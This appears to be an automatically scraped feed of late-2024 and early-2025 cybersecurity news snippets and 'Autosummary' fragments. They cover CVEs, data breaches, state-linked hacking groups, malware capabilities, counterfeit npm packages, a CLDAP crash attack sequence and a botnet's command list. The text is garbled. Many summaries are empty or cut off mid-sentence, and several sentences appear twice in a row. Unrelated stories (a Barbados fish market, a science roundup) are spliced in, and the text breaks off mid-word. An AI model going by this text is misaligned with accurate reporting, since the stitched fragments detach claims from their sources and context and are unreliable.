“We have identified a high (CVE Score 8.2) firewall vulnerability that is susceptible to actual exploitation for customers with SSL VPN or SSH management enabled and that should be mitigated immediately by upgrading to the latest firmware, which will be web-posted tomorrow, Jan 7th, 2025. "In this Help Net Security interview, Sean Embry, CISO at eBay, discusses key aspects of cybersecurity leadership. He shares insights on balancing long-term strategic planning with immediate threat response, evaluating the ROI of new technologies, and addressing employee cybersecurity fatigue. As a CISO, how do you balance long-term strategic cybersecurity investments with immediate tactical threat response? The most important word here is “balance”, and effective cybersecurity programs need to have a longer-term strategy but be … More
The post eBay CISO on managing long-term cybersecurity planning and ROI appeared first on Help Net Security.
"Autosummary:
They need to form a broad communications base within the company to understand the state of security and compliance across the entire enterprise (that means hygiene, controls, access, platform security, perimeter security, etc.) and what the business strategy or new high-priority efforts are (e.g. Agentic GPT). It’s this shared understanding and support that helps us prevent fatigue, and we utilize several mechanisms to ensure our teams are included in our plans: We have virtual architecture teams with representation from all of the technology domains where we review the architecture and engineering behind new tools or policies (scalability, access management, compute impact, etc.). "McAfee launched the AI-powered McAfee Scam Detector — a tool designed to protect against text, email, and video scams. Today’s scams are smarter, sneakier, and more convincing than ever — and they’re everywhere. 59% of Americans say they or someone they know has fallen for an online scam in the last 12 months, with scam victims losing an average of $1,471. The rise of deepfakes and ease of access to the AI tools to create … More
The post McAfee Scam Detector spots scams across text, email, and video appeared first on Help Net Security.
"Autosummary:
That’s where McAfee Scam Detector comes in, giving control back to consumers and stopping scammers in their tracks with proactive, real-time protection against suspicious texts, fake emails, and deepfake videos that look incredibly real — all cleverly designed by scammers to steal people’s money and personal information. Every day, scammers trick people with fake texts, emails, and videos, and the results can be devastating.Simple notifications: Alerts come in the form of unobtrusive notifications, whether via your mobile app, email inbox, or video platform, to ensure you know what’s suspicious and why. "Autosummary:
The server subsequently responds with a Plugin Orchestrator that, in addition to reporting system-related information to the server (e.g., NetBIOS name of the domain; physical and virtual memory usage; and system locale and time zone settings), harvests details about running processes and awaits further instructions - Receive and inject plugins into memory Unload a specific plugin from memory, remove the plugin from the list Remove all plugins from the list Check if the plugin is loaded or not "All the plugins are responsible for receiving and executing commands from the orchestrator," the researchers said, adding they perform file operations, manage processes, maintain remote connections, manage system services, and list network connections. "The United Nation’s International Civil Aviation Organization (ICAO) confirmed on Monday that it’s “actively investigating reports of a potential information security incident allegedly linked to a threat actor known for targeting international organizations.” The statement came a few days after 42,000 documents allegedly stolen from the organizations have been offered for sale on a underground forum. The forum user, who goes by Natohub, claims that the stolen documents contain user data: first and last name, … More
The post UN aviation agency investigating possible data breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Legacy Multi-Factor Authentication (MFA) Cause of Death: Compromised by sophisticated phishing, man-in-the-middle (MitM), SIM-swapping, and MFA prompt bombing attacks." The Role of FIDO2 and Phishing-Resistant Authentication: In place of legacy MFA, phishing-resistant, FIDO2-compliant solutions have emerged as the gold standard for authentication, driving the industry toward a passwordless future.These solutions deliver adaptive, context-aware security, and integrate biometrics, hardware security keys, and passwordless technologies to provide unparalleled user convenience and resilience against evolving threats. Additionally, passwordless solutions integrate seamlessly with identity and access management (IAM) systems, creating a unified approach to authentication, lifecycle management, and compliance monitoring. "Autosummary:
"Autosummary:
"Autosummary:
BleepingComputer has contacted T-Mobile requesting a statement on the Washington AG lawsuit, and a spokesperson sent us the following comment: "We have had multiple conversations about this incident from 2021 with the Washington AG"s office over the last several years and even reached out in late November to continue discussions, so the office"s decision to file a lawsuit yesterday came as a surprise," T-Mobile told BleepingComputer. "Autosummary:
The study, titled Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects, evaluates the capability of large language models (LLMs) to conduct personalized phishing attacks and compares their performance with human experts and AI models from last year. "Autosummary:
"Autosummary:
The latest announcement from the company lists the following exposed data: Employees (6,456 individuals) : Name, employee number, email address, affiliation, gender, date of birth, family details, address, phone number, taxpayer ID numbers, and HQ system account information. "Autosummary:
Huawei routers (via CVE-2017-17215) Neterbit routers (custom exploit) LB-Link routers (via CVE-2023-26801) Four-Faith Industrial Routers (via the zero-day now tracked as CVE-2024-12856) PZT cameras (via CVE-2024-8956 and CVE-2024-8957) "Autosummary:
" The program was unveiled in July 2023, when major electronics, appliance, and consumer product makers like Amazon, Google, Best Buy, LG Electronics U.S.A., Logitech, and Samsung Electronics announced their participation. "With the EU’s Digital Operational Resilience Act (DORA) deadline approaching on 17th January, 2025, Europe’s top 100 companies face an urgent cybersecurity challenge, according to SecurityScorecard. A-rated companies safer from breaches The report highlights the role of SecurityScorecard’s A-to-F rating system in delivering actionable insights into cyber resilience. Companies with an A rating were found to be 13.8 times less likely to experience a breach than those with an F rating. Europe’s largest organizations are … More
The post Only 26% of Europe’s top companies earn a high rating for cybersecurity appeared first on Help Net Security.
"Autosummary:
Scandinavian companies lead in cybersecurity, with only 20% receiving a C rating or lower, compared to the UK (24%), Germany (34%), France (40%), and Italy (41%). "Phishing remains one of the most significant cyber threats impacting organizations worldwide, according to SlashNext. Credential phishing is raising Credential theft attacks surged dramatically in the second half of 2024 (703%), signaling a sharp escalation in the use of sophisticated phishing kits and social engineering tactics. These attack methods frequently overlap, as many credential phishing attempts incorporate malicious links as part of their strategy. Overall, email-based threats rose by 202% in the latter half of … More
The post Users receive at least one advanced phishing link every week appeared first on Help Net Security.
"Autosummary:
AI-generated attacks becoming more sophisticated Looking ahead to 2025, we expect this evolution to accelerate, with AI-generated attacks becoming more sophisticated and harder to detect, while attackers increasingly target messaging platforms beyond email, including business collaboration tools, SMS, and social media. "This article highlights key findings and trends in healthcare cybersecurity for 2024. From the rising impact of cyberattacks on patient care to the vulnerabilities posed by medical devices and supply chains, these insights provide an overview of the current state of cybersecurity in the healthcare sector. 6 key elements for building a healthcare cybersecurity response plan With 89% of practices already using tools like two-factor authentication (2FA), the importance of integrating robust cybersecurity software cannot … More
The post Is healthcare cybersecurity in critical condition? appeared first on Help Net Security.
"Autosummary:
The consequences of potential failures caused by cybersecurity incidents that affect end-of-life patient devices—including infusion pumps, network modules, gateways, incubators, cardiac rhythm management systems, mobility monitors, and others—can impact patient safety. "Autosummary:
China-linked Salt Typhoon APT compromised more US telecoms than previously known Pierluigi Paganini January 06, 2025 January 06, 2025 China-linked Salt Typhoon group that breached multiple US telecoms compromised more firms than previously known, WSJ says. "Autosummary:
This week"s list includes — CVE-2024-43405 (ProjectDiscovery Nuclei), CVE-2024-54152 (Angular Expressions), CVE-2024-12912, CVE-2024-13062 (ASUS router AiCloud), CVE-2024-12828 (Webmin CGI), CVE-2024-56040, CVE-2024-56041 (VibeThemes VibeBP), CVE-2024-56042, CVE-2024-56043, CVE-2024-56044, CVE-2024-56045, CVE-2024-56046 (VibeThemes WPLMS), CVE-2024-56249 (Webdeclic WPMasterToolKit), CVE-2024-56198 (path-sanitizer npm package), CVE-2024-55078 (WukongCRM), and CVE-2024-12583 (Dynamics 365 Integration plugin)."The companies are also prohibited from misrepresenting how they collect, maintain, use, delete or disclose consumers" personal information; and the extent to which the companies protect the privacy, security, availability, confidentiality, or integrity of personal information," the FTC said."The companies are also prohibited from misrepresenting how they collect, maintain, use, delete or disclose consumers" personal information; and the extent to which the companies protect the privacy, security, availability, confidentiality, or integrity of personal information," the FTC said.The vulnerability, tracked as CVE-2024-49113 (CVSS score: 7.5), was patched by Microsoft last month, along with CVE-2024-49112 (CVSS score: 9.8), a remote code execution flaw in the same component.The vulnerability, tracked as CVE-2024-49113 (CVSS score: 7.5), was patched by Microsoft last month, along with CVE-2024-49112 (CVSS score: 9.8), a remote code execution flaw in the same component. 📰 Around the Cyber World Two Indian Nationals Charged in the U.S. — The U.S. Department of Justice has announced charges against two Indian nationals, Ahmed Maqbul Syed, 57, and Rupesh Chandra Chintakindi, 27, for orchestrating a tech support fraud scheme targeting elderly victims in the U.S. Both have been charged with conspiracy to commit money laundering. — The U.S. Department of Justice has announced charges against two Indian nationals, Ahmed Maqbul Syed, 57, and Rupesh Chandra Chintakindi, 27, for orchestrating a tech support fraud scheme targeting elderly victims in the U.S. Both have been charged with conspiracy to commit money laundering.The largest single thefts amounted to $55.48 million and $32.51 million in August and September, respectively, accounting for 52% of the year"s total large-scale (above $1 million) losses, per Scam Sniffer.The largest single thefts amounted to $55.48 million and $32.51 million in August and September, respectively, accounting for 52% of the year"s total large-scale (above $1 million) losses, per Scam Sniffer." 🎥 Expert Webinar Future-Ready Trust: Manage Certificates Like Never Before — Trust is the foundation of every digital interaction, but managing it across users, devices, and systems is harder than ever. "Autosummary:
Once installed, the dropper acts as a delivery vehicle for the main payload, which is responsible for exfiltrating sensitive data, including notifications, messages, and other app data, to a Firebase Realtime Database endpoint. "Autosummary:
The list of identified counterfeit packages is as follows - nomicsfoundations @nomisfoundation/hardhat-configure installedpackagepublish @nomisfoundation/hardhat-config @monicfoundation/hardhat-config @nomicsfoundation/sdk-test @nomicsfoundation/hardhat-config @nomicsfoundation/web3-sdk @nomicsfoundation/sdk-test1 @nomicfoundations/hardhat-config crypto-nodes-validator solana-validator node-validators hardhat-deploy-others hardhat-gas-optimizer solidity-comments-extractors Of these packages, @nomicsfoundation/sdk-test has attracted 1,092 downloads. "Autosummary:
"Autosummary:
The Indiana Office of Inspector General (OIG) later uncovered evidence that Westend Dental had experienced a ransomware attack on or around October 20, 2020, involving state residents’ protected health information, but Westend Dental still denied there had been a data breach. "Autosummary:
Some of the other notable provisions of the DPDP Act that data fiduciaries are expected to comply are listed below - Implement mechanisms for detecting and addressing breaches and maintenance of logs In the event of a data breach, provide detailed information about the sequence of events that led to the incident, actions taken to mitigate the threat, and the identity of the individual(s), if known, within 72 hours (or more, if permitted) to the Data Protection Board (DPB) Delete personal data no longer needed after a three-year period and notify individuals 48 hours before erasing such information Clearly display on their websites/apps the contact details of a designated Data Protection Officer (DPO) who is responsible for addressing any questions regarding users" processing of personal data Obtain verifiable consent from parents or legal guardians prior to processing the personal data of children under 18 or persons with disabilities (exemptions include healthcare professionals, educational institutions, and childcare providers, but only restricted to specific activities like health services, educational activities, safety monitoring, and transportation tracking) "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
It also comes with capabilities to drop more payloads, block mouse and keyboard input, clear Windows event logs, wipe clipboard data, perform file operations, delete caches and profiles associated with web browsers like Sogou, QQ, 360 Safety, Firefox, and Google Chrome, and erase profiles and local storage for messaging applications such as Skype, Telegram, and QQ. "Autosummary:
"Autosummary:
" "I decided to donate the equipment I acquired with my own resources to the chamber," she said in statement on X, following a social media backlash. "Autosummary:
At its core, the problem stems from the use of regular expressions (aka regex) for signature validation and the parsing conflict arising as a result of using both regex and YAML parser, thus opening the door to a scenario where an attacker can introduce a "\r" character such that it sidesteps the regex-based signature verification and gets interpreted as a line break by the YAML parser. "Autosummary:
Next, it extracts and installs the main malware payload, ‘Telegram Premium.apk’, which requests permissions to monitor notifications, clipboard data, SMS, and telephony services, among others. "Autosummary:
Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered. "Autosummary:
Next, it extracts and installs the main malware payload, ‘Telegram Premium.apk’, which requests permissions to monitor notifications, clipboard data, SMS, and telephony services, among others. "A recent Domo report shows that the world’s internet population has reached a record high of 5.52 billion people and uncovers signs that AI may be unseating digital juggernauts as it brings in new forms of engagement. “The phenomenal acceleration of generative AI over the past two years has dominated the digital conversation, and this year’s Data Never Sleeps report shows how we’ve reached a new tipping point – AI is primed to dethrone competitive … More
The post Every minute, 4,080 records are compromised in data breaches appeared first on Help Net Security.
"Autosummary:
“In the year ahead, we’ll be watching how this shift changes our broad range of digital activity, impacts the competitive landscape, and accelerates corporate investment in AI-ready data and tech,” according to James. "Autosummary:
"Autosummary:
Below is the attack sequence devised by the researchers: The Attacker sends a CLDAP referral response packet with a specific value resulting in LSASS to crash and force a reboot of the Victim server The attacker sends a DCE/RPC request to the Victim Server Machine The Victim is triggered to send a DNS SRV query about SafeBreachLabs.pro The Attacker’s DNS server responds with the Attacker’s hostname machine and LDAP port The Victim sends a broadcast NBNS request to find the IP address of the received hostname (of the Attacker’s) The Attacker sends an NBNS response with its IP Address The Victim becomes an LDAP client and sends a CLDAP request to the Attacker’s machine The researchers speculate that the same attack could allow a remote attacker to execute arbitrary code on vulnerable servers by modifying the CLDAP packet. "Autosummary:
"Autosummary:
RUMC disclosed a data breach that potentially involved sensitive files containing personal and health information, including names, Social Security numbers, dates of birth, driver’s license numbers or state identification numbers, other government identification numbers, financial account information, credit or debit card information, biometric information, user credentials, medical treatment/diagnosis information, and/or health insurance policy information. "Autosummary:
“The exfiltrated data is temporarily stored in the Firebase Realtime Database at the URL “https[:]//androidscamru-default-rtdb[.]firebaseio[.]com” and is later removed after potentially filtering and storing the important content in another private storage location” The dropper requests extensive permissions, such as app management, storage access, and updating or deleting apps without user consent. "While the majority of employees avoid risky behaviors, a small subset makes them a habit, posing a significant cybersecurity challenge, according to Mimecast. 48% of employees engaged in behaviors that exposed their organizations to cyber risk, with browsing violations being the most common (36% of users). Browsing violations, unlike phishing and malware events, do not directly impact security. However, they can increase the likelihood of encountering malware or online scams. Impersonation phishing widespread across sectors … More
The post When risky cybersecurity behavior becomes a habit among employees appeared first on Help Net Security.
"Autosummary:
Executives, sales, and board members, being public-facing roles, also receive a high volume of phishing emails. "This article presents key findings from 2024 reports on data breaches. Breaches are taking longer to resolve and are becoming more costly for organizations. With recovery times extending and costs increasing, businesses face growing challenges in managing the aftermath. Full recovery from breaches takes longer than expected In 2024, businesses reported taking an average of 7.3 months to recover from cybersecurity breaches – 25% longer than expected and over a month past the anticipated timeline of 5.9 … More
The post The real cost of data breaches for businesses appeared first on Help Net Security.
"Autosummary:
On average, enterprises already have 53 security solutions in use across their organization, however, despite large security stacks, 51% of enterprises reported a breach over the past 24 months. "Autosummary:
"Dieter S. scouted out some of the targeted objects on site, taking photos and videos, for example of military transports and goods," prosecutors said, adding the intelligence information was then passed on to his contact. "Autosummary:
"Autosummary:
Three Russian-German nationals charged with suspicion of secret service agent activity Pierluigi Paganini January 02, 2025 January 02, 2025 German authorities have charged three Russian-German nationals with suspicion of, among other things, secret service agent activity for the Russian government. "Autosummary:
"Autosummary:
However, when they click on the page, they are actually clicking on links and buttons on the hidden iframe (the legitimate site), which could potentially perform malicious actions, such as authorizing an OAuth application to connect to their account or accepting an MFA request. "Autosummary:
RIBridges is an integrated eligibility system (IES) used by the state to manage and deliver social assistance programs, including healthcare, food assistance, child care, and other services. "Autosummary:
In August 2024, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) jointly accused Iran of attempting to undermine democratic processes, including by orchestrating cyber operations designed to gain access to sensitive information related to the elections. "Autosummary:
" Clickjacking, also called UI redressing, refers to an attack technique in which users are tricked into clicking on a seemingly innocuous web page element (e.g., a button), leading to the deployment of malware or exfiltration of sensitive data. "Autosummary:
“At the direction of, and with financial support from, the GRU, CGE and its personnel used generative AI tools to quickly create disinformation that would be distributed across a massive network of websites designed to imitate legitimate news outlets to create false corroboration between the stories, as well as to obfuscate their Russian origin.” "Autosummary:
Data breaches linked to these attacks, which started in April 2024, have affected hundreds of millions of individuals using the services of AT&T, Ticketmaster, Santander, Pure Storage, Advance Auto Parts, Los Angeles Unified, QuoteWizard/LendingTree, and Neiman Marcus. On February 19, authorities took down LockBit"s infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel. CDK Global provides clients in the auto industry with a SaaS platform that handles all aspects of a car dealership"s operation, including CRM, financing, payroll, support and service, inventory, and back-office operations.2024 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities. Information-stealing malware campaigns are running rampant this year, used in many different campaigns to steal infected users" browser information, cookies, saved credentials, credit cards, and cryptocurrency wallets.Attacks on edge networking devices run rampant This year, we continued to see attacks targeting edge networking devices from various manufacturers, including Fortinet, TP-Link, Ivanti, and Cisco. Microsoft continued to delay its release while adding additional features, such as automatically filtering sensitive content, allowing users to exclude specific apps, websites, or in-private browsing sessions, and it can be removed if needed. "Autosummary:
An X user claimed a 7-Zip zero-day vulnerability, but 7-Zip’s creator says is a fake Pierluigi Paganini December 31, 2024 December 31, 2024 An X user using the handle @NSA_Employee39 disclosed a zero-day vulnerability in the open-source file archive software 7-Zip. "This article highlights key findings and trends in the 2024 IT and cybersecurity skills gap, from the shortage of cybersecurity talent to the rising demand for certifications and upskilling programs, offering insights into the current state of skills development in the tech industry. Most women in IT work overtime to advance in their careers While 32% of respondents already think that men and women are treated equally in the workplace, 31% of women strongly believe … More
The post The state of cybersecurity and IT talent shortages appeared first on Help Net Security.
"Autosummary:
95% of surveyed employees said their organization has a talent development program in place, but only 25% find it to be highly effective, with a lack of time (42%), learning formats (30%), and leadership support (26%) as their main obstacles. "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. SafeLine: Open-source web application firewall (WAF) SafeLine is an open-source and self-hosted Web Application Firewall (WAF) that protects websites from cyber attacks. Trapster Community: Open-source, low-interaction honeypot Trapster Community is an open-source, lightweight, low-interaction honeypot designed for deployment within internal networks. It enhances network security by creating a deceptive layer that monitors and detects suspicious activities. FuzzyAI: … More
The post Hottest cybersecurity open-source tools of the month: December 2024 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Microsoft has since updated its documentation to emphasize the access policy risk, stating: "To prevent unauthorized access and management of your key vaults, keys, secrets, and certificates, it"s essential to limit Contributor role access to key vaults under the Access Policy permission model. "Autosummary:
"Autosummary:
"Autosummary:
Medical information was leaked by the earlier mentioned Change Healthcare breach, but we saw several smaller incidents at providers in the healthcare industry like Australia’s leading medical imaging provider I-MED Radiology, US and UK based healthcare provider DocGo that offers mobile health services, ambulance services, and remote monitoring for patients, nonprofit, outpatient provider of treatment for Opioid Use Disorder (OUD) To support this nomination, I will remind you of several high-profile breaches, some of a size almost beyond imagination, some that really left us worried because of the type of data that was stolen, and a few duds. "Autosummary:
ZAGG disclosed a data breach that exposed its customers’ credit card data Pierluigi Paganini December 30, 2024 December 30, 2024 ZAGG Inc. notifies customers of credit card data breach, after threat actors hacked a third-party app from its e-commerce provider. "Autosummary:
"Beryl was like a surprise attack, like an ambush," says Cornelius, in a deep baritone voice, over the market"s chatter, reggae and thwack of cleavers on chopping boards."I feel if we can communicate to the global superpowers the pain that we feel seeing this happen to our environment," adds 16-year-old Adrielle Baird, "then it would help them to understand and help us collaborate to find ways to fix the issues that we"re seeing."At the Oistins Fish Market in Bridgetown, flying fish are still available, along with marlin, mahi-mahi and tuna, though only a handful of stalls are open. "In this Help Net Security interview, Vineet Chaku, President of Reaktr.ai, discusses how AI is transforming cybersecurity, particularly in anomaly detection and threat identification. Chaku talks about the skills cybersecurity professionals need to collaborate with AI systems and address the ethical concerns surrounding deployment.
The post The sixth sense of cybersecurity: How AI spots threats before they strike appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Vineet Chaku, President of Reaktr.ai, discusses how AI is transforming cybersecurity, particularly in anomaly detection and threat identification.AI systems need a lot of data to function, raising concerns about how that data is collected, stored, and used.We need to develop skills in areas like figuring out how threats might affect AI systems, understanding how to protect against attacks that target AI itself, and working with AI to develop stronger security strategies. "Cybercriminals are using a variety of new methods to target organizations across industries. In this article, we examine the most pressing trends and findings from the 2024 surveys on the growing threat of cybercrime. Social engineering scams sweep through financial institutions North American financial institutions fielded 10 times more reports of social engineering scams in 2024 than they did a year ago. Account-opening fraud declined by nearly 60% in the last year, as banks implemented additional controls, … More
The post Cybercriminals tighten their grip on organizations appeared first on Help Net Security.
"Autosummary:
Fraudsters primarily used text messages (50%), fake websites (48%), social media (37%), hacking (31%), BEC scams (31%) and deepfakes (11%) to dupe organizations. Malware families such as Gafgyt (3.12%), Mirai (2.09%), and Bedevil (1.84%) appeared less often than in prior years, which may be a reflection of attempts to neutralize botnets from propagating. "Autosummary:
Threat actors attempt to exploit a flaw in Four-Faith routers Pierluigi Paganini December 30, 2024 December 30, 2024 VulnCheck researchers warn that threat actors are attempting to exploit a high-severity vulnerability impacting some Four-Faith routers. "Autosummary:
The list includes — CVE-2024-56337 (Apache Tomcat), CVE-2024-45387 (Apache Traffic Control), CVE-2024-43441 (Apache HugeGraph-Server), CVE-2024-52046 (Apache MINA), CVE-2024-12856 (Four-Faith routers), CVE-2024-47547, CVE-2024-48874, and CVE-2024-52324 (Ruijie Networks) 📰 Around the Cyber World ScreenConnect Used to Deploy AsyncRAT — Microsoft has revealed that cybercriminals are leveraging tech support scams to deploy AsyncRAT through the remote monitoring and management (RMM) software ScreenConnect, the first time that ScreenConnect is used to deploy malware, instead of as a persistence or lateral movement tool."However, the fact that one of the previous CARR administrators, "MotherOfBears," has joined NoName057(16), the continuous forwarding of CARR posts, and previous statements, suggest that both groups seem to collaborate closely, which can also indicate a cooperation with Sandworm Team.""However, the fact that one of the previous CARR administrators, "MotherOfBears," has joined NoName057(16), the continuous forwarding of CARR posts, and previous statements, suggest that both groups seem to collaborate closely, which can also indicate a cooperation with Sandworm Team."At a larger scale, if an adversary is able to write Group Policy Objects (GPOs), then they would be able to distribute this policy throughout the domain and systematically stop most, if not all, security solutions on all endpoints in the domain, potentially allowing for the deployment of post-exploitation tooling and/or ransomware.A lesser number of victims have been recorded in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.A lesser number of victims have been recorded in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam."In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack," authorities said."In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack," authorities said."The new Convention against Cybercrime will enable faster, better-coordinated, and more effective responses, making both digital and physical worlds safer," the UN said. "Autosummary:
Flaw details and scope CVE-2024-12856 is an OS command injection flaw impacting Four-Faith router models F3x24 and F3x36, typically deployed in energy and utilities, transportation, telecommunications, and manufacturing sectors. "Autosummary:
IntelBroker claimed to have gained access to Github projects, Gitlab Projects, SonarQube projects, Source code, hard coded credentials, Certificates, Customer SRCs, Confidential Documents, Jira tickets, API tokens, AWS Private buckets, company Technology SRCs, Docker Builds, Azure Storage buckets, Private & Public keys, SSL Certificates, Cisco Premium Products, and other info. "Autosummary:
“The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s (ASD’s) "Autosummary:
"Autosummary:
The list of targets includes popular D-Link devices used by individuals and organizations such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. For initial access, the two pieces of malware use known exploits for CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. "Autosummary:
Lost city found by accident and a fly"s brain mapped: 2024"s scientific wins Reuters A "chopsticks" rocket catch by Elon Musk"s SpaceX was among the highlights of 2024 A total solar eclipse seen by millions, a lost jungle city discovered by accident and hope for the almost extinct northern white rhino - science has given us a lot to get excited about this year. Conservation slowed nature loss Robin Moore/Re:wild Cuban crocodiles at a breeding sanctuary - one of a number of conservation actions studied With human activity driving what conservation charity the World Wide Fund for Nature (WWF) calls a "catastrophic" loss of species, it can sometimes feel like we don"t hear an awful lot of good news about nature. Getty Images There are no pictures of the city but it had pyramid temples similar to this one in nearby Calakmul In the city, which had disappeared under jungle canopy in Mexico, archaeologists found pyramids, sports fields and amphitheatres. "Autosummary:
"Autosummary:
North Korea actors use OtterCookie malware in Contagious Interview campaign Pierluigi Paganini December 28, 2024 December 28, 2024 North Korea-linked threat actors are using the OtterCookie backdoor to target software developers with fake job offers. "Autosummary:
"In this Help Net Security interview, Patrick Harding, Chief Architect at Ping Identity, discusses the growing threat of deepfake-related fraud and its impact on financial security. He also discusses overlooked vulnerabilities in digital banking and offers advice for organizations to protect themselves from fraud in the coming years.
The post Overwhelmed by fraud? Here’s how financial pros fight back appeared first on Help Net Security.
"Autosummary:
From an organizational perspective, leaders can always lean on external partners to provide guidance on deploying verifiable credentials, biometric systems, and layered intelligence to build a resilient zero trust architecture, tailored to the specific needs of their business. AI technology continues to become more sophisticated, so organizations’ understanding of their systems’ vulnerabilities, awareness of these threats, and technology in place to combat them need to be taken extremely seriously. "Autosummary:
Randomize the victim hosts" nickname NICK - Change the nickname of the victim host SERVER - Change command-and-control server ENABLE - Enable the bot KILL - Kill the session GET - Download a file VERSION - Requests version of the victim host IRC - Forward a message to the server SH - Execute shell commands ISH - Interact with victim host"s shell SHD - Execute shell command and ignore signals INSTALL - Download and install a binary to "/var/bin" BASH - Execute commands using bash BINUPDATE - Update a binary to "/var/bin" via get LOCKUP - Kill Telnet backdoor and execute the malware instead HELP - Display help information about the malware STD - Flooding attack with random hard-coded strings for the port number and target specified by the attacker UNKNOWN - UDP flooding attack with random characters for the port number and target specified by the attacker HTTP - HTTP flooding attack. "Autosummary:
"Autosummary:
The malware is equipped to harvest information about disks (drive letter, drive type, media type, size, and free space), system metadata, files and documents matching extensions DOC, DOCX, XLS, XLSX, PDF, TXT, RTF, and RAR, and files related to the Telegram messaging app. "Autosummary:
"Autosummary:
Among Cyberhaven"s customers are Snowflake, Motorola, Canon, Reddit, AmeriHealth, Cooley, IVP, Navan, DBS, Upstart, and Kirkland & Ellis. "Autosummary:
"Autosummary:
In September 2024, Singaporean cybersecurity company Group-IB documented the first major revision to the attack chain, highlighting the use of an updated version of BeaverTail that adopts a modular approach by offloading its information-stealing functionality to a set of Python scripts collectively tracked as CivetQ. It"s worth noting at this stage that Contagious Interview is assessed to be disparate from Operation Dream Job, another long-running North Korean hacking campaign that also employs similar job-related decoys to trigger the malware infection process. "Service disruptions remain a critical concern for IT and business executives, with 88% of respondents saying they believe another major incident will occur in the next 12 months, according to PagerDuty. PagerDuty surveyed 1,000 IT and business executives who were director level and above, from the US, UK, Australia and Japan. Organizations must focus on preventing service disruptions 86% of executives surveyed now realize that they have been prioritizing security at the expense of readiness … More
The post Service disruptions continue to blindside businesses appeared first on Help Net Security.
"Autosummary:
Nearly half in the US (48%), Australia (48%), and the UK (47%), along with a majority in Japan (53%) believe that limited access to real-time data tools will further hinder their organizations during an outage, if approaches to service disruption are not prioritized. "Managing cybersecurity and IT budgets is a critical element of organizational strategy. With increasing threats to data security, the rise of ransomware, and the need to protect IT infrastructure, organizations must invest wisely in cybersecurity to stay secure. This article shares key insights from cybersecurity budget surveys conducted in 2024. Despite massive security spending, 44% of CISOs fail to detect breaches Despite global information security spending projected to reach $215 billion in 2024, 44% of … More
The post Cybersecurity spending trends and their impact on businesses appeared first on Help Net Security.
"Autosummary:
The top three areas of investment for 2024 cybersecurity budgets are internal security assessments (60%), identity and access management (IAM) programs (58%) and the acquisition of additional cybersecurity tools (51%). "The mobile threat landscape continues to grow at an alarming rate as cybercrime groups shift their tactics and target mobile devices in the early stages of their attacks, according to a recent Lookout report. The report highlights insights behind a 17% increase QoQ (quarter on quarter) in enterprise-focused credential theft and phishing attempts, 32% increase QoQ in malicious app detections and a trend showing iOS devices are more exposed to phishing attacks than Android devices. … More
The post iOS devices more exposed to phishing than Android appeared first on Help Net Security.
"Autosummary:
With the commoditization of advanced malware, evolution of nation-state mobile malware capabilities, and a heavy reliance on mobile-focused social engineering, organizations today must have advanced mobile threat defense as part of their security strategy. "Autosummary:
Chinese-speaking activity APT41 attacks According to Mandiant researchers, the threat actor APT41 (aka Barium, Wicked Panda, Wicked Spider, Earth Baku, Axiom, Blackfly, Brass Typhoon, Barium, Bronze Atlas, HOODOO, Red Kelpie, TA415 and Winnti) launched data exfiltration attacks against global shipping and logistics, media, technology and automotive sectors, primarily in Italy, Spain, Taiwan, Thailand, Turkey and the UK.Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims from sectors including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, communications, and critical infrastructure.They believe Unit 29155 is responsible for targeting the Ukrainian government, critical infrastructure organizations, and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, as well as Central American and Asian countries.The group has been active since at least 2018 and targets organizations and individuals in Colombia, Ecuador, Chile, Panama, and other Latin American countries, focusing on various sectors, including government, finance, energy, oil and gas. SloppyLemming attacks According to Cloudflare, the threat actor SloppyLemming (aka Outrider Tiger) has been targeting organizations in the government, law enforcement, energy, education, telecoms and technology sectors in Pakistan, Bangladesh, Sri Lanka, Nepal and China.In addition, it has the functionality to steal credentials from Outlook, browsers, crypto wallets, Telegram and Steam sessions, Discord tokens, password managers, data from Windows Credential Manager and Windows Vault, as well as read the list of active processes and installed applications. Southeast Asia and Korean Peninsula Andariel attacks The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI) and other authoring partners published a Cybersecurity Advisory on July 25 focusing on the state-sponsored cybergroup known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa.CLNTEND, first detected in April 2024, is a remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445).Using these tools, the group managed to carry out a number of new attacks against various Russian facilities: an instrumentation manufacturer, a polymer materials plant, a mechanical plant, a technology park, a leasing company, an oil and gas company, and an IT company.Nevertheless, some network activity from the botnet has been detected over the last four years targeting critical sectors in the USA and Taiwan, including military, government, higher education, telecoms, defense industrial base, and IT.The affiliates then moved laterally inside the network using methods such as RDP, PsExec, AnyDesk, Connectwise, N-Able, Cobalt Strike, Metasploit, and others.Data 